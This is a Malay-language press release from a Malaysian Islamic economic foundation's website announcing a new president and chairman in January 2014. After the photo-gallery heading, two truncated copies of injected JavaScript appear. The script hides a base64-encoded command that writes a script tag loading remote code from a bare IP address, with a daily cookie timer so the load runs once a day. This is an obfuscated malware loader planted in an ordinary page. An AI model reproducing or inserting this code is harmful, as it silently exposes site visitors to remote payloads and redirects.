YaPEIM » Pelantikan Dato’ Hj Abd Malek Awang Kechil sebagai Presiden & Pengerusi YaPEIM

Terkini

Pelantikan Dato’ Hj Abd Malek Awang Kechil sebagai Presiden & Pengerusi YaPEIM

PUTRAJAYA, 06 Januari 2014 (Isnin):  Ketua Pengarah Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM),  Dato’. Hj. Abd Malek Awang Kechil telah dilantik sebagai Presiden & Pengerusi Lembaga Pemegang Amanah YaPEIM yang baru berkuatkuasa mulai 1 Januari 2014.

Menteri di Jabatan Perdana Menteri, Mejar Jeneral (B) Dato’ Seri Jamil Khir Baharom ketika mengumumkan perkara itu berkata, lantikan itu bagi menggantikan Dato’ Ahmad Tajuddin Abdul Rahman yang telah tamat tempoh perkhidmatannya pada 31 Disember yang lalu, setelah beliau memberikan perkhidmatannya sejak tahun 1996.

Jamil Khir berkata, YaPEIM dahulunya terkenal dengan institusi yang menerima amal jariah kini telah bertukar imejnya kepada sebuah institusi yang menjadi perancang dan pembangun program sosioekonomi ummah menerusi pelbagai strategi dan program yang diperkenalkan.

“Saya mencadangkan juga agar YaPEIM boleh memikirkan untuk turut membantu umat Islam di negara ini dalam bidang peruncitan seperti terbabit sepenuhnya dalam mengendalikan Kedai Rakyat 1Malaysia, dengan pengalamannya dalam memperluaskan sistem Ar-Rahnu ke seluruh negara.

“Melalui cara ini, umat Islam tidak terbeban dengan kenaikan harga barang yang menjadi fenomena sejagat sekarang,” katanya selepas menyaksi majlis menandatangani lantikan Abd Malek di pejabatnya, hari ini.

Abd Malek memulakan kariernya di YaPEIM sejak tahun 1985 dan dilantik sebagai Ketua Pengarah YaPEIM mulai tahun 1995 dan berkhidmat sehingga 31 Disember 2013 yang lalu.

Jamil Khir berkata, peranan institusi seperti YaPEIM sangat diperlukan sebagai menyokong dan melengkapi usaha kerajaan dalam memastikan setiap anggota masyarakat di negara ini tidak ada yang terpinggir, malah semuanya akan mendapat pembelaan yang sewajarnya.

Sementara itu, Warga YaPEIM menganggap ketiadaan Dato’ Ahmad Tajuddin sebagai Pengerusi YaPEIM merupakan suatu kehilangan kepada institusi ini; bagaimanapun Warga YaPEIM juga amat mengalu-alukan perlantikan dan  kepercayaan yang diberikan oleh Y.A.B. Dato’ Sri Mohd Najib Tun Abdul Razak selaku Perdana Menteri dan Y.B. Mejar Jeneral Dato’ Seri Jamil Khir bin Hj Baharom,  Menteri Di Jabatan Perdana Menteri terhadap Dato’ Hj. Abd Malek sebagai Presiden dan Pengerusi Lembaga Pemegang Amanah YaPEIM yang baru, dan menganggap perlantikan ini merupakan  suatu pengiktirafan dan  kepercayaan yang sangat besar daripada kepimpinan tertinggi Negara terhadap keupayaan Pengurusan YaPEIM.

Warga YaPEIM akan mendokong dan memberi kerjasama yang optimum kepada   kepimpinan Dato’ Hj. Abd Malek dan penuh yakin dengan kepimpinan beliau, berasaskan rekod prestasi institusi ini yang sangat membanggakan, sejak beliau menerajui kepimpinan tertinggi pengurusan YaPEIM.

Berasaskan komitmen tinggi beliau dan barisan Ahli Lembaga Pemegang Amanah yang baru; serta gandingan dengan Pengurusan dan warga kerja YaPEIM; insyaAllah institusi ini akan mampu menerus dan memantapkan sumbangan yang lebih pesat dalam usaha membangun sosioekonomi dan memperkasa ummah selaras dengan Wawasan dan Misi YaPEIM menjelang 2020.

(Nota: Dato’ Hj Abd Malek bin Awang Kechil, merupakan mantan Ketua Pengarah dan Ketua Pegawai Eksekutif Kumpulan YaPEIM. Beliau memulakan kariernya di YaPEIM sejak tahun 1985 dan dilantik sebagai Ketua Pengarah YaPEIM mulai tahun 1995 dan berkhidmat sehingga 31 Disember 2013 yang lalu)

KENYATAAN MEDIA DIKELUARKAN OLEH

HAJI MOHAMMAD ZAMRI ZAKARIA,
PENGARAH BAHAGIAN PERHUBUNGAN KORPORAT, MEDIA & SERANTA, YaPEIM

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top